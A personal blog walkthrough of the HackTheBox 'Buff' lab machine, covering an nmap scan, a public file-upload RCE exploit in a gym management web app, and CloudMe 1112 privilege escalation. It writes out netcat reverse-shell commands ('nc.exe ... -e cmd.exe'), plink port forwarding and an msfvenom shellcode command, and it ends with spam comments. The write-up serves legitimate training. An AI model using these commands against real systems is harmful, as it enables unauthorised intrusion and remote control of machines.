Buff hackthebox walkthrough

Buff hackthebox walkthrough

Hey there! This is Shreya and today I am gonna show you how to pwn buff from hackthebox. Buff is an easy level windows machine having a straightforward way to obtain initial foothold. Privilege escalation to Administrator requires to abuse a service that has its exploit available on exploit-db, still its tricky to get through.

With that being said, let’s get started.


Starting with nmap scan, I found only one open port.

# nmap -sC -sV -oA buff.nmap

Nmap scan report for
Host is up (0.53s latency).
Not shown: 999 filtered ports
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sun Jul 26 11:45:15 2020 -- 1 IP address (1 host up) scanned in 83.46 seconds

Going up there on , A page landed

About fitness

The application had a lots of clickable links. I thought it would be sql injection but it wasn’t. But I saw something in the application’s footer.

The project seems to be taken from projectworlds.in

I googled for term About Fitness projectworld.in and got the one that I was really interested in. It was gym management system having the same functionalities/UI/UX that we had in our vulnerable box.


Next, I searched the google if I could find any exploits for this project and you guess it right. I found one on exploit-db


I copied the exploit to my kali machine and ran the exploit.

# python exploit.py

And I got the shell, but it was not good enough. So I read the specifics of exploit to find out what exactly is happening. Here, the upload directory didnt had any authorization check and anybody could access it. Also, there was a file upload vulnerability that can lead to RCE by crafting a malicious php payload that bypasses all the file upload filters.

The exploit is uploading a malicious payload in kamehameha.php under /upload having the get parameter as telepathy.

Run the following url and open up a netcat listener on the port specified in the nc.exe command ( nc.exe is already present in the current directory thats accessible.) 4444 -e cmd.exe

And we got the user directly! Awesome!! Lets grab the user.txt

Privilege escalation

I fired up winPEAS.exe and the terminal was flowing with results! It was really difficult to find stuff that could really lead to privilege escalation.

After a bit of searching manual searching in directories, I found that cloudme_1112.exe was present inside C:\Users\shaun\Downloads. It seemed to be an interesting file.

I googled for cloudme_1112 exploit and luckily found one here!!!

The exploit says run the service followed by executing the script. The payload corresponding to your port and ip has to be generated via msfvenom.

The service is listening on, as can be seen when netstat -ano is executed.

The exploit is written in python, but unfortunately we dont have python present on the box. So there are 2 ways in which we can run our exploit

  1. Convert the python exploit into the .exe that can be exeuted directly on the vulnerable windows machine.
  2. Open a reverse connection using plink that forwards remote port over the local address.

I’ll be showing you the second method.

Very first, we need to download the plink.exe. It can be found here.

Upload plink.exe to windows machine.

PS> wget -o plink.exe

Now run the following command on windows to forward (where the service is running) to (on the attacker machine)

PS> plink.exe -l root -pw toor -R 8888:

Now run netstat on attacker machine to see if is listening

Yes it is!! and that’s great. Next up, the payload has to be created using msfvenom to get a reverse shell.

On attacking machine, execute the following

# msfvenom  -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 4444 -e cmd.exe' -b '\x00\x0a\x0d' -f py -v payload

This will generate a payload that needs to be replaced with the one that is already present in the exploit script.

Now open up a nc listener on port 4444 ( as it is specified in the msfvenom payload) and simply execute the python script ( do it atleast 3-4 times until you get a shell).

This will execute as if we the executing the script on the windows box and we get a reverse shell on the listener.

The administrator is now owned!!! Go grab the root.txt

That’s all from the blog post! Thanks for reading.
See you in the next one. Until then, happy hunting!!!


I am Shreya Pohekar. I love to build and break stuff. Currently, I'm working as iOS and angular developer. I am also a contributor to CodeVigilant project. My blogs are focused on Infosec and Dev and its how to's.

This Post Has 4 Comments

  1. WWW.XMC.pl

    When you write your life stories, don’t let anyone else keep the pilots


    Great stuff.Id like to suggest taking a look at things like cheese. What do you think?

  3. yuhisern

    Awesome writeup girl, thanks for additional information.

  4. Lillie

    We’re a group of volunteers and starting a new scheme in our community.
    Your website offered us with valuable info to work on. You’ve done an impressive
    process and our entire neighborhood will be grateful to you.

Leave a Reply